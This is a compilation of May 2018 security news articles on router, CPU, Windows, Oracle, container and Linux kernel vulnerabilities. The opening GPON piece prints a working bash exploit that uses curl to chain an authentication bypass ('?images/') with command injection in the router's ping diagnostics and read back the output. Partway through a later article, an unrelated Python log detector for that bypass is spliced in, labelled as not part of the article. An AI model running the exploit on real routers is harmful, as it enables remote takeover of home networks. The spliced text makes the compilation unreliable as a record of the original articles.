“Since the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it’s quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.” reads the analysis published by VPNMentor.

The experts included the following bash version of the exploit code:

#!/bin/bash

echo "[+] Sending the Command... "

“We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices” continues the post:

curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting...."
sleep 3
echo "[+] Retrieving the ouput...."
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'

GPON is a very popular passive optical network technology that uses fiber optics, and these devices are provided by ISPs. In the video, you can see that over one million people use this type of network router.

Below a video PoC published by the researchers:

“We tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise.” concluded the experts.

Recommendations:
Check if your router uses the GPON network.
Be aware that GPON routers can be hacked and exploited.
Talk to your ISP to see what they can do to fix the bug.
Warn your friends on Facebook and Twitter.
Update May 08, 2018
The Italian security expert Federico Valentini (@f3d_0x0), ICT Security researcher at Cefriel, published a Python exploit for Remote Code Execution on GPON home routers (CVE-2018-10562).

The PoC code is available on GitHub:

https://github.com/f3d0x0/GPON


Logitech Patches Several Flaws in Harmony Hub
7.5.2018 securityweek
Vulnerebility

FireEye researchers have discovered several vulnerabilities in the Logitech Harmony Hub home control system. The vendor has released a firmware update that patches the flaws.

Logitech Harmony Hub allows users to control home entertainment and various other smart devices from an Android or iOS phone or tablet. Once initial pairing is done over Bluetooth, the Harmony app communicates with the Harmony hub using an HTTP-based API.

Researchers at FireEye have discovered several types of vulnerabilities that can be exploited by an attacker with access to the local network to take control of devices linked to the Hub and compromise other devices on the network.

The security firm believes the flaws could pose a serious risk considering that the Harmony Hub is used by some people to control smart locks and thermostats.

Logitech Harmony Hub vulnerabilities

Experts discovered four types of vulnerabilities that can be combined to gain root access to a device via SSH.

One of the security holes is related to the presence of debugging details in the production firmware image. Another flaw is related to improper SSL certificate validation during firmware updates. The firmware update process itself has also been found to be insecure, allowing an attacker to deliver a malicious update to the device.

Since no root password has been configured on the hub, an attacker could gain root access via SSH if they can somehow manage to enable the Dropbear SSH server. Enabling the server is possible by uploading specially crafted firmware using the previously described weakness.

Logitech was informed about the vulnerabilities in late January and patched them on April 10 with the release of firmware version 4.15.96. The vendor has advised customers to install the update and provided complete instructions on how to do so.

The company noted that the flaws affect its Harmony Hub-based products, which include Harmony Elite, Home Hub, Ultimate Hub, Home Control, Pro, Smart Control, Companion, Smart Keyboard, Ultimate, Ultimate Home, and Harmony Hub.

“As technology becomes further embedded into our daily lives, the trust we place in various devices unknowingly increases exponentially. Due to the fact that the Harmony Hub, like many IoT devices, uses a common processor architecture, malicious tools could easily be added to a compromised Harmony Hub, increasing the overall impact of a targeted attack,” FireEye researchers explained.


Chrome freezes PC running Windows OS after Windows 10 April update
7.5.2018 securityaffairs
Vulnerebility

Some Chrome users are reporting freezes and timeouts after the installation of the Windows 10 April Update; let’s see what has happened.
After installing the Windows 10 April Update, I observed continuous freezes while using the Chrome browser on one of my PCs; in some cases I was not able to reach the websites I wanted to visit, apparently because of connection problems.

I was reading some posts when I found a post written by Lawrence Abrams on Bleeping Computer that claims some Chrome users are reporting freezes and timeouts after the installation of the Windows 10 April Update.

“When these freezes occur, it turns the screen black and Windows becomes completely unresponsive until the user reboots the computer or restarts their graphic driver.” wrote Abrams.

The same problem was reported by many users who shared their experience in a Reddit post; some users have tried updating the video drivers or using different Chrome versions without success.

Personally, I forced the sleep mode by pressing the power button on my laptop, then turning on again.

Lawrence explained that according to two tickets opened at Google, there are two distinct problems associated with the April 2018 Update (build 1803) and Chrome.

The freezing problems are the result of a crash of the video driver, and the problem may be related to a site that needs hardware acceleration. According to a bug ticket, the issue affects Chrome version 66.0.3359.139 running on Windows 10, and disabling hardware acceleration fixes the problem.

A second issue is associated with connections to SSL websites; according to a second ticket, the problem could be a Registry permission problem with the Windows Cryptographic Services (CryptoSvc).

Windows 10 April update

Microsoft has published a post to provide a temporary fix to the freezing problems.

Emanuel (@emannxx) wrote on Twitter on May 3, 2018:

“Upgraded my work laptop to Windows 10 1803 and, guess what? Totally unusable, just like my personal laptop. Desktop kept freezing randomly when closing/switching UWP apps. Tired of trying to raise awareness for this. To hell with it. #WindowsInsiders”

“This Answers post advises users that they can use the Windows logo key + Ctrl + Shift + B keyboard combination to resolve the issue when their computer freezes. This keyboard combination causes the video driver to restart, which will cause the normal Windows screen to appear again.” added Abrams.
“Unfortunately, this just resolves the issue of the driver crashing, but does not actually resolve the problem and users will continue to see these black screens when the video driver crashes again.”
In my case, uninstalling the video driver and installing it again apparently solved the issue.


Spectre-NG – Researchers revealed 8 new varieties of the Spectre flaws
5.5.2018 securityaffairs
Vulnerebility

A group of security researchers has reportedly discovered 8 new varieties of the Spectre vulnerabilities, dubbed Spectre-Next Generation or Spectre-NG, that affect Intel CPUs.
A German security website reported that an unnamed team of researchers has discovered new flaws related to the issues reported in the original Spectre and Meltdown attacks.

The eight new Spectre-NG vulnerabilities in Intel CPUs also affect some ARM processors. At the time of writing, the researchers have only disclosed partial details of the vulnerabilities, to the German computer magazine Heise.

Intel has already acknowledged the Spectre-NG vulnerabilities and classified four of them as “high risk” and four as “medium.”

“Intel is already working on its own patches for Spectre-NG and developing others in cooperation with the operating system manufacturers. According to our information, Intel is planning two waves of patches. The first is scheduled to start in May; a second is currently planned for August.” reported the German computer magazine Heise.

“Knowing that Google Project Zero discovered one of the Spectre-NG flaws gives us an idea of when to expect the first patch.”

One of the flaws could be exploited by attackers with access to a virtual machine (VM) to take over the host system.

“One of the Spectre-NG flaws simplifies attacks across system boundaries to such an extent that we estimate the threat potential to be significantly higher than with Spectre. Specifically, an attacker could launch exploit code in a virtual machine (VM) and attack the host system from there – the server of a cloud hoster, for example.” continues the report.

“Alternatively, it could attack the VMs of other customers running on the same server. Passwords and secret keys for secure data transmission are highly sought-after targets on cloud systems and are acutely endangered by this gap.”

The original Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing information to leak from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

Spectre attacks exploit the CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2) flaws. While Meltdown and Spectre Variant 1 can be addressed via software, Spectre Variant 2 required a microcode update for the affected processors.

According to the German magazine, one of the Spectre-NG vulnerabilities was discovered by a white hat hacker at Google’s Project Zero, who reported it to Intel 88 days ago.

If the vulnerability is not fixed within the 90-day period set by Google’s disclosure policy, the Project Zero team could publicly share technical details of at least one flaw as early as May 7th (one day before the Windows Patch Tuesday).

According to the magazine, there are signs that Microsoft is also preparing for CPU patches to release in the upcoming months.

The real problem is that this new wave of patches could have effects similar to those of the original ones in terms of performance and stability; we can only sit and wait for them.


Hackers Target Flaws Affecting a Million Internet-Exposed Routers
4.5.2018 securityweek 
Vulnerebility

Just a few days after they were disclosed, malicious actors started targeting a couple of flaws affecting routers made by South Korea-based Dasan Networks. There are roughly one million potentially vulnerable devices accessible directly from the Internet.

vpnMentor on Monday disclosed the details of two vulnerabilities in Gigabit-capable Passive Optical Network (GPON) routers made by Dasan and distributed to users by ISPs that provide fiber-optic Internet.

One of the flaws (CVE-2018-10561) allows a remote attacker to bypass a router’s authentication mechanism simply by appending the string “?images/” to a URL in the device’s web interface. The second vulnerability (CVE-2018-10562) can be exploited by an authenticated attacker to inject arbitrary commands.
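As an added example that is not part of this article, the earlier GPON write-up, or vpnMentor’s tooling, here is a small log detector for the “?images/” authentication-bypass pattern described above: it scans constructed Common Log Format lines from a router or an ISP-side reverse proxy, flags requests that carry the bypass string in the query, and groups hits by source to spot the diag_Form-then-diag.html sequence of the published exploit. The log format, the documentation-range IP addresses and the chaining heuristic are assumptions, not anything Dasan or vpnMentor published.

```python
"""Detect CVE-2018-10561-style auth-bypass attempts against Dasan GPON routers
in HTTP access logs. Added example; log format and sample lines are constructed."""
import re
from typing import NamedTuple, Dict, List, Tuple
from urllib.parse import urlsplit, unquote

# Common Log Format (assumed): host ident authuser [timestamp] "METHOD target HTTP/x" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3})'
)

# Constructed sample log; IPs come from the RFC 5737 documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [04/May/2018:10:00:01 +0000] "GET /images/logo.png HTTP/1.1" 200 1024
192.0.2.10 - - [04/May/2018:10:00:02 +0000] "GET /login.html HTTP/1.1" 200 512
198.51.100.7 - - [04/May/2018:10:01:10 +0000] "GET /menu.html?images/ HTTP/1.1" 200 2048
198.51.100.7 - - [04/May/2018:10:01:11 +0000] "POST /GponForm/diag_Form?images/ HTTP/1.1" 200 0
198.51.100.7 - - [04/May/2018:10:01:14 +0000] "GET /diag.html?images/ HTTP/1.1" 200 900
203.0.113.5 - - [04/May/2018:10:02:00 +0000] "GET /GponForm/diag_Form?images%2F HTTP/1.1" 200 0
192.0.2.10 - - [04/May/2018:10:03:00 +0000] "GET /images/bg.jpg?v=3 HTTP/1.1" 200 300
"""

DIAG_FORM = "/gponform/diag_form"   # command-injection surface (CVE-2018-10562)
DIAG_PAGE = "/diag.html"           # where the router echoes ping output


class Finding(NamedTuple):
    host: str
    ts: str
    method: str
    target: str
    reasons: Tuple[str, ...]


def analyse_target(target: str) -> List[str]:
    """Return why a request target looks like the GPON bypass chain (empty if benign).

    The vulnerable server grants access when the URL contains an image-like path, so
    the tell-tale is 'images/' sitting in the query string rather than the path.
    Percent-encoded variants are decoded first so 'images%2F' is caught too."""
    parts = urlsplit(target)
    query = unquote(parts.query).lower()
    reasons: List[str] = []
    if "images/" in query:
        reasons.append("auth-bypass pattern: 'images/' in query string (CVE-2018-10561)")
        if parts.path.lower().startswith(DIAG_FORM):
            reasons.append("bypass aimed at diagnostic form (CVE-2018-10562 surface)")
    return reasons


def scan_log(text: str) -> List[Finding]:
    """Parse CLF lines and keep only those matching the bypass pattern."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue  # not CLF; a production scanner would count/alert on these
        reasons = analyse_target(m["target"])
        if reasons:
            findings.append(Finding(m["host"], m["ts"], m["method"], m["target"], tuple(reasons)))
    return findings


def likely_chains(findings: List[Finding]) -> Dict[str, List[str]]:
    """Heuristic (assumed, not vendor guidance): a single source that both hits the
    diag form and then fetches /diag.html with the bypass mirrors the exploit flow."""
    paths_by_host: Dict[str, List[str]] = {}
    for f in findings:
        paths_by_host.setdefault(f.host, []).append(urlsplit(f.target).path.lower())
    return {host: paths for host, paths in paths_by_host.items()
            if DIAG_FORM in paths and DIAG_PAGE in paths}


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(f"{hit.ts} {hit.host} {hit.method} {hit.target}: {'; '.join(hit.reasons)}")
    print("likely exploit chains:", likely_chains(hits))
```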

Researchers warned that cybercriminals could combine the two security holes to remotely take control of vulnerable devices and possibly the victim’s entire network.

A Shodan search shows that there are roughly one million GPON home routers exposed to the Internet, a majority located in Mexico, Kazakhstan, and Vietnam.

The Network Security Research Lab at Chinese security firm Qihoo 360 reported on Thursday that it had already started seeing attempts to exploit CVE-2018-10561 and CVE-2018-10562. The company has promised to provide more details soon.

Hackers target Dasan router vulnerabilities

The fact that cybercriminals have started exploiting these vulnerabilities is not surprising considering that devices made by Dasan have been known to be targeted by botnets.

Researchers revealed in February that the Satori botnet had ensnared thousands of Dasan routers by exploiting a remote code execution vulnerability disclosed in December 2017 by Beyond Security, which claimed the vendor had ignored repeated attempts to report the issue.

vpnMentor said its attempts to report CVE-2018-10561 and CVE-2018-10562 to Dasan were also unsuccessful before its disclosure, but a representative of the manufacturer did reach out to the company after details of the security holes were made public.


Intel Working on Patches for 8 New Spectre-Like Flaws: Report
4.5.2018 securityweek 
Vulnerebility

Researchers have discovered a total of eight new Spectre-like vulnerabilities, including flaws that may be more serious and easier to exploit, according to German magazine c’t.

The flaws were reportedly identified by several research teams, including Google Project Zero, whose employees were among those who initially discovered the Meltdown and Spectre attack methods. C’t, which is owned by Heise, claims it has obtained the information exclusively and confirms the existence of the vulnerabilities and their severity.

The new vulnerabilities, dubbed “Spectre Next Generation” or “Spectre-NG,” are said to affect processors from Intel and at least some ARM chips. AMD processors are currently being analyzed to determine if they are impacted as well.

Intel has confirmed that it’s working on patching some vulnerabilities, but it has not provided any details. C’t reports that Intel will release updates in two waves – the first expected in May and the second in August.

There are currently two main versions of the Spectre vulnerability: variant 1 and variant 2. Variant 1 attacks can be mitigated using software updates, but variant 2 requires microcode updates as well. C’t says Microsoft is also working on mitigations, which indicates that the Spectre-NG flaws require both software and firmware updates.

Of the eight Spectre-NG flaws, four have been classified as high severity and four as medium severity, with CVE identifiers being prepared for each issue.

While the risk and attack scenarios are similar to the original Spectre, c’t says there is one exception. One of the flaws can be exploited to execute arbitrary code in virtual machines and compromise the host system, and the attack is relatively easy to conduct, especially compared to the original Spectre. Cloud service providers such as Cloudflare and Amazon are reportedly affected the most.

On the other hand, c’t reports that the Spectre-NG flaws are unlikely to be exploited at scale against personal and corporate computers.

“Assuming they prove to be legitimate, the group of vulnerabilities coined as ‘Spectre-NG’ may pose significantly higher risks to cloud operators and multi-tenant environments than the original variants of Spectre. The information provided to the German technology site Heise seems to imply that a few of the eight new vulnerabilities facilitate VM-escape mechanisms, allowing a threat actor to compromise the hypervisor and/or other tenants from their own VM, apparently with little-to-no effort,” Craig Dods, Chief Security Architect at Juniper Networks, told SecurityWeek.

“As a point of reference, Spectre v1/v2 were quite difficult to use for the purposes of VM-escape within cloud environments. The details that are available for ‘Spectre-NG’ hint that it’s incredibly easy to use, but we won’t know for sure until we can see what the actual problems are,” Dods added.

Satya Gupta, CTO and co-founder of Virsec, is not surprised that new variants of the Spectre attack have emerged.

“Now that the core vulnerabilities of speculative execution have been publicized, many well-funded hacking groups globally are racing to find new ways to exploit them. These are advanced attacks exploiting small, but repeatable flaws that skip important security controls in literally billions of processors,” Gupta said via email. “While not all applications will be vulnerable and some compensating controls will be effective, the attackers are relentless and will continuously search for cracks in other defenses that allow Spectre to be exploited.”

Several other side-channel attack methods have been identified since the disclosure of Spectre and Meltdown, including ones dubbed BranchScope, SgxPectre, and MeltdownPrime and SpectrePrime.


Meltdown patch made the headlines again, it can be bypassed in Windows 10
4.5.2018 securityaffairs
Vulnerebility

The problems with the mitigations for the Meltdown flaw continue: a security researcher has demonstrated that the Meltdown patch in Windows 10 can be bypassed.
The Windows Internals expert Alex Ionescu discovered that a Meltdown patch issued for Windows 10 is affected by a severe vulnerability that could be exploited to bypass it.

“Calling NtCallEnclave returned back to user space with the full kernel page table directory, completely undermining the mitigation,” reads a tweet he posted on Twitter.

Alex Ionescu
@aionescu
Welp, it turns out the #Meltdown patches for Windows 10 had a fatal flaw: calling NtCallEnclave returned back to user space with the full kernel page table directory, completely undermining the mitigation. This is now patched on RS4 but not earlier builds -- no backport??

3:47 PM - May 2, 2018
Ionescu explained that Microsoft addressed the flaw with the release of the Windows 10 version 1803, also known as April 2018 Update.

Microsoft acknowledged the issue reported by the expert and is currently working to provide a fix to include in Windows 10 version 1790 (Fall Creators Update), which is the only version affected.

The Meltdown and Spectre attacks could be exploited by attackers to bypass memory isolation mechanisms and access target sensitive data.

The Meltdown attack (CVE-2017-5754 vulnerability) could allow attackers to read the entire physical memory of the target machines stealing credentials, personal information, and more.

Meltdown exploits speculative execution to breach the isolation between user applications and the operating system; in this way any application can access all system memory.

The good news is that Meltdown attacks are not easy to conduct and the risk of exploitation is considered low.

Meltdown patch

Unfortunately, the timeline of the Meltdown patch is full of problems: the first release was promptly suspended by Microsoft in January due to instability issues observed on AMD processors.

A week ago, the security researcher Ulf Frisk reported that some of the Meltdown and Spectre security updates for Windows introduce severe flaws.

He noticed that the Meltdown and Spectre security updates released by Microsoft in January and February for Windows 7 and Windows Server 2008 R2 are affected by a vulnerability that could be exploited by attackers to easily read from and write to memory.

According to the expert, an attacker can exfiltrate gigabytes of data per second by exploiting the vulnerability.


Meltdown Patch in Windows 10 Can Be Bypassed
4.5.2018 securityweek 
Vulnerebility

A researcher has discovered that a mitigation implemented by Microsoft in Windows 10 for the Meltdown vulnerability can be bypassed. The tech giant says it’s working on an update.

According to Windows internals expert Alex Ionescu, a Meltdown mitigation in Windows 10 has what he describes as “a fatal flaw.”

“Calling NtCallEnclave returned back to user space with the full kernel page table directory, completely undermining the mitigation,” Ionescu wrote on Twitter.

Meltdown mitigation in Windows 10 bypassed

The researcher said Microsoft included a patch for this issue in the recently released Windows 10 version 1803, also known as April 2018 Update, Redstone 4 and RS4.

Microsoft told SecurityWeek that the company is working on providing an update for Windows 10 version 1790, also known as the Fall Creators Update, which appears to be the only version affected.

While the Meltdown mitigation bypass is interesting from a research perspective, exploitation requires local code execution privileges and the risk of malicious attacks is low.

The patches released by Microsoft for the Meltdown vulnerability have caused problems from day one. Shortly after the Meltdown and Spectre flaws were disclosed in early January, users started complaining that Microsoft’s updates had been causing Windows to break down on computers with AMD processors.

More recently, a researcher discovered that Meltdown mitigations for Windows 7 and Windows Server 2008 R2 introduced a serious privilege escalation vulnerability that may be worse than Meltdown.


MassMiner Attacks Web Servers With Multiple Exploits
4.5.2018 securityweek 
Exploit  Vulnerebility

A recently discovered crypto-currency mining malware family is using multiple exploits in an attempt to increase its chances of successfully compromising web servers, AlienVault has discovered.

Dubbed MassMiner, the malware includes a fork of internet scanning tool MassScan, which in this case passes a list of private and public IP ranges to scan during execution. After compromising a target, the malware first attempts to spread to other hosts on the local network, and then attempts propagation over the Internet.

AlienVault observed multiple versions of MassMiner and says the malware continues to spread. The security firm identified compromised systems in Asia, Latin America, and Europe, but hasn’t established yet the full extent of the infection.

After leveraging MassScan for reconnaissance, the malware attempts to exploit vulnerable systems using the CVE-2017-10271 WebServer Exploit, the CVE-2017-0143 NSA-linked SMB Exploit (EternalBlue, used to install DoublePulsar), and the CVE-2017-5638 Apache Struts Exploit. It also attempts to brute force Microsoft SQL Servers using SQLck.

Once a Microsoft SQL server has been compromised, a script that installs MassMiner is executed, followed by a 1000+ line SQL script that disables important security features on the server, such as anti-virus protections.

On the Weblogic servers, the MassMiner malware is downloaded using a PowerShell script, and a VisualBasic script deploys the malware onto Apache Struts servers.

After being deployed, the malware achieves persistence, schedules tasks to execute its components, modifies access control lists (ACLs) to grant full access to certain files on the system, and kills the Windows Firewall.

MassMiner downloads a configuration file from a remote server. This file contains information on the server to download updates from, the executable to infect other machines with, and the Monero wallet and mining pool to send mined currency to.

“However, if the http request for the config file is never responded, the malware is capable of successfully running the Miner with its default configuration,” AlienVault notes.

In addition to the crypto-miner, the malware also attempts to install the classic Gh0st backdoor onto the infected machines. This suggests that the malware operators might be setting up for further attacks, the same as the recently detailed PyRoMine malware did.

AlienVault has identified two Monero wallets belonging to the MassMiner operators.


CVE-2018-2879 – Vulnerability in Oracle Access Manager can let attackers impersonate any user account
4.5.2018 securityaffairs
Vulnerebility

Security researchers have discovered a security vulnerability in Oracle Access Manager that can be exploited by a remote attacker to bypass the authentication and take over the account of any user.
Security researcher Wolfgang Ettlinger from SEC Consult Vulnerability Lab has discovered a security vulnerability in Oracle Access Manager that can be exploited by a remote attacker to bypass the authentication and take over the account of any user or administrator on affected systems.

Oracle Access Management provides Web SSO with MFA, coarse-grained authorization and session management, and standard SAML Federation and OAuth capabilities to enable secure access to mobile applications and external cloud.

The flaw, tracked as CVE-2018-2879, relates to a flawed cryptographic format used by the Oracle Access Manager.

“The Oracle Access Manager is the component of the Oracle Fusion Middleware that handles authentication for all sorts of web applications,” SEC Consult researcher Wolfgang Ettlinger explained.

“we will demonstrate how minor peculiarities of the cryptographic implementation had a real-life impact on the security of the product. By exploiting this vulnerability we were able to fabricate arbitrary authentication tokens, allowing us to impersonate any user and effectively break the main functionality of OAM.”

Ettlinger explained that an attacker can exploit a vulnerability in the way OAM handles encrypted messages to trick the software into accidentally disclosing information that can be used to log in impersonating other users.

The attacker can use a padding oracle attack to disclose an account’s authorization cookie, and can then create a script that generates valid login keys for any desired user, including administrators.

“During a research project, we found that a cryptographic format used by the OAM exhibits a serious flaw. By exploiting this vulnerability, we were able to craft a session token. When a WebGate is presented with this token, it would accept it as a legitimate form of authentication and allow us to access protected resources.” explained the expert.

“What’s more, the session cookie crafting process lets us create a session cookie for an arbitrary username, thus allowing us to impersonate any user known to the OAM.”

The following video PoC shows that an attacker can impersonate arbitrary users by triggering the flaw.

Oracle Access Management 11g and 12c versions were both affected by the vulnerability. The experts used a simple Google Dork to find about 11,800 OAM installs, some of them belonging to high-profile organizations (including Oracle). We have to consider that there are many other installations that are not reachable from the Internet.

Oracle Access Manager

The experts responsibly disclosed this flaw to Oracle in November 2017. The IT giant addressed it with the latest Critical Patch Update (CPU) in April 2018.

“As this patch was provided in Oracle’s regular update schedule, we expect OAM administrators to have applied the patch by now. If this is not the case for your organization, it’s high time to do so now” continues the advisory.

Technical details about the CVE-2018-2879 are included in the security advisory published by the SEC Consult Cryptography Competence Center.


Microsoft Patches Critical Flaw in Open Source Container Library
4.5.2018 securityweek 
Vulnerebility

Microsoft informed users on Wednesday that an update for the Windows Host Compute Service Shim library patches a critical remote code execution vulnerability.

Introduced in January 2017, the Windows Host Compute Service (HCS) is a low level container management API for Microsoft’s Hyper-V hypervisor. The tech giant has made available two open source wrappers that allow users to call the HCS from higher level programming languages instead of the C API directly.

One of these wrappers is the Windows Host Compute Service Shim (hcsshim), which supports launching Windows Server containers from the Go language. Hcsshim is mainly used in the Docker Engine project, but Microsoft says it can be freely used by others as well.

Swiss developer and security researcher Michael Hanselmann discovered that hcsshim fails to properly validate input when importing a container image, allowing a malicious actor to remotely execute arbitrary code on the host operating system.

“To exploit the vulnerability, an attacker would place malicious code in a specially crafted container image which, if an authenticated administrator imported (pulled), could cause a container management service utilizing the Host Compute Service Shim library to execute malicious code on the Windows host,” Microsoft said in its advisory.

The vulnerability, tracked as CVE-2018-8115, has been classified as critical, but Microsoft believes it is unlikely to be exploited for malicious purposes. Technical details of the issue have not been made public.

The flaw has been fixed with the release of hcsshim 0.6.10, which can be obtained from GitHub. US-CERT has also released an alert advising users to apply the update.

This is not the only out-of-band update released by Microsoft recently. Last month, the company updated its Malware Protection Engine to patch a vulnerability that can be exploited to take control of a system by placing a malicious file in a location where it would be scanned.

UPDATE. Hanselmann says he reported the vulnerability to both Microsoft and Docker in February. The researcher will release technical details and a proof-of-concept (PoC) exploit on May 9.


Over a Million Dasan Routers Vulnerable to Remote Hacking
4.5.2018 securityweek 
Vulnerebility

Researchers have disclosed the details of two unpatched vulnerabilities that expose more than one million home routers made by South Korea-based Dasan Networks to remote hacker attacks.

In a blog post published on Monday, vpnMentor revealed that many Gigabit-capable Passive Optical Network (GPON) routers, which are used to provide fiber-optic Internet, are affected by critical vulnerabilities. The company told SecurityWeek that the impacted devices are made by Dasan Networks.

One of the flaws, tracked as CVE-2018-10561, allows a remote attacker to bypass a router’s authentication mechanism simply by appending the string “?images/” to a URL in the device’s web interface.

The second vulnerability, identified as CVE-2018-10562, allows an authenticated attacker to inject arbitrary commands.

By combining the two security holes, a remote and unauthenticated attacker can take complete control of a vulnerable device and possibly the entire network, vpnMentor said. The company has published a video showing how the attack works:

A Shodan search shows that there are more than one million GPON home routers exposed to the Internet, a majority located in Mexico (480,000), Kazakhstan (390,000), and Vietnam (145,000).

“Depending on what the attacker wants to achieve, he can be spying on the user and any connected device (TV, phones, PC and even speakers like Amazon Echo). Also he can inject malware into the browser which means even when you leave your home network your device would be hacked now,” Ariel Hochstadt, co-founder of vpnMentor, told SecurityWeek. “If the hacker is resourceful (government etc) he can enable advanced spear phishing attacks, and even route criminal activities through exploited routers (Imagine the FBI knocks on your door telling you they saw someone in your house using your IP address and selling stolen credit card numbers on the dark web).”

vpnMentor said it did try to report its findings to Dasan before making any information public, but it did not receive a response. Dasan representatives, specifically a PR agency, reached out to vpnMentor on LinkedIn after its blog post was published.

While in some cases Dasan has shown interest in working with researchers who discovered vulnerabilities in its products, there are some advisories online describing potentially critical issues that the vendor has apparently ignored.

Malicious actors have been known to target Dasan devices. Researchers reported recently that the Satori botnet had ensnared thousands of Dasan routers by exploiting a remote code execution vulnerability. The flaw in question was disclosed in December 2017 by Beyond Security, which claimed the vendor had ignored repeated attempts to report the issue.

This is not the first time vpnMentor reports finding vulnerabilities in network devices. Last month, the company disclosed the details of an unpatched command injection vulnerability that can be exploited to take control of network-attached storage (NAS) devices from LG.


Microsoft addressed critical flaw in Windows Host Compute Service Shim library
3.5.2018 securityaffairs
Vulnerebility

Microsoft released an out of band update to address a critical remote code execution vulnerability in the Windows Host Compute Service Shim library (hcsshim).
Microsoft announced that it has issued a security update to address a critical remote code execution vulnerability in the Windows Host Compute Service Shim library (hcsshim).

The Windows Host Compute Service (HCS) is a low-level container management API in Hyper-V; Microsoft implemented two open source wrappers to invoke HCS functions from higher level programming languages.

The Windows Host Compute Service Shim wrapper, introduced in January 2017, allows the launch of Windows Server containers from the Go language.

“We’ve released two wrappers thus far. One is written in Go (and used by Docker), and the other is written in C#.” reads a blog post published by Microsoft.

“You can find the wrappers here:

https://github.com/microsoft/dotnet-computevirtualization
https://github.com/microsoft/hcsshim”
The security expert Michael Hanselmann discovered that hcsshim fails to properly validate input when importing a container image. The vulnerability, tracked as CVE-2018-8115, could be exploited by a remote attacker to execute arbitrary code on the host operating system.

“A remote code execution vulnerability exists when the Windows Host Compute Service Shim (hcsshim) library fails to properly validate input while importing a container image.” reads the security advisory published by Microsoft.

“To exploit the vulnerability, an attacker would place malicious code in a specially crafted container image which, if an authenticated administrator imported (pulled), could cause a container management service utilizing the Host Compute Service Shim library to execute malicious code on the Windows host.”

Windows Host Compute Service Shim library

While US-CERT has released an alert urging users to update the library, Microsoft tried to downplay the problem, explaining that it is unlikely that the flaw could be exploited in attacks in the wild.

Microsoft addressed the vulnerability with the out-of-band update hcsshim 0.6.10 that is available on GitHub.


Privilege Escalation Bug Lurked in Linux Kernel for 8 Years
2.5.2018 securityweek
Vulnerebility

A security vulnerability in a driver leading to local privilege escalation in the latest Linux Kernel version was introduced 8 years ago, Check Point reveals.

The security flaw provides a local user with access to a vulnerable privileged driver with the possibility to read from and write to sensitive kernel memory. Tracked as CVE-2018-8781, the vulnerability could be exploited to escalate local privileges, Check Point's researchers say.

The bug impacts the internal mmap() function defined in the fb_helper file operations of the “udl” driver of “DisplayLink” and was discovered using a simple search.

Because drivers commonly implement their own version of file operation functions, they are prone to implementation errors, and the discovery of this vulnerability is proof of that.

In fact, there are various common vulnerabilities impacting drivers where the mmap() handler is used, such as lack of input validations and Integer-Overflows.

A classic driver, the researchers explain, holds an internal buffer representing the shared memory region with the peripheral device, and should only let the user access memory ranges inside this buffer.

The prototype of the mmap() function includes numerous fields that an attacker can control, so developers should perform a series of checks to avoid possible integer overflows.

According to Check Point, there are three checks that should be performed: Region start: 0 <= offset < buffer’s end; Region end: buffer’s start <= offset + length <= buffer’s end; and Region start <= Region End.

“In actual fact, the last check can be spared since the Linux kernel will sanitize the supplied length, making it practically impossible to pass the first two checks while still passing the third check,” Check Point says.

The researchers discovered the security flaw while taking a closer look at remap_pfn_range(), a function of high importance, because it maps physical memory pages to the user.

“The video/drm module in the kernel defines a default mmap() wrapper that calls that real mmap() handler defined by the specific driver,” the security researchers note.

The bug is a classic example of an integer overflow: because the offset is unsigned, the first check was skipped, but the calculation “offset + size” can wrap around to a low value and thus pass the second check while still using an illegal “offset” value.

As there are only 48 bits of accessible memory on 64-bit machines, the use of a huge “offset” to bypass the check requires making sure that “info->fix.smem_start + offset” will wrap-around to a valid mappable physical address, Check Point also notes.

The vulnerability was verified on an Ubuntu 64-bit virtual machine where a simulated vulnerable driver was loaded. The driver’s mmap() handler contained the check implementation under test in each run.

Two consecutive calls to mmap() on the vulnerable driver were made by user-mode code, namely a sanity check and a vulnerability check.

Setting the buffer’s address at the page-aligned physical address of the kernel’s /dev/urandom implementation results in the output providing the correct physical page and the previous physical page, respectively.

Additional checks revealed that it is possible for the user to read and write from/to the mapped pages. Thus, an attacker could eventually trigger code execution in kernel space, the researchers explain.

“While the vulnerability was found using a simple search, it was introduced to the kernel eight years ago. This fact can teach us that even on a popular open source project as the Linux Kernel, you could always hope to find vulnerabilities if you know where to search,” Check Point concludes.

The vulnerability was disclosed to the Linux Kernel on March 18 and a patch was issued the same day. After the patch was verified, the official Linux patch was issued for CVE-2018-8781 on March 21 and was integrated into the Linux Kernel the same day.


CVE-2018-8781 Privilege Escalation flaw was introduced in Linux Kernel 8 years ago
2.5.2018 securityaffairs
Vulnerebility

Researchers from security firm Check Point discovered a security vulnerability in a driver in the Linux kernel, tracked as CVE-2018-8781, that leads to local privilege escalation.
The CVE-2018-8781 flaw, introduced 8 years ago, could be exploited by a local user with access to a vulnerable privileged driver to escalate local privileges and read from and write to sensitive kernel memory.

Experts explained that it is common for drivers to implement their own version of the file operation functions; this is visible by analyzing the file_operations struct of a driver.

Such kind of implementations could introduce flaws such as Integer-Overflows and the lack of input validations.

The CVE-2018-8781 flaw revealed by Check Point affects the internal mmap() function defined in the fb_helper file operations of the “udl” driver of “DisplayLink.”

“A classic driver should probably look like this:

The driver will hold an internal buffer that represents the shared memory region with the peripheral device.
The driver should only let the user access memory ranges that fall inside this buffer.” states the analysis published by Check Point.

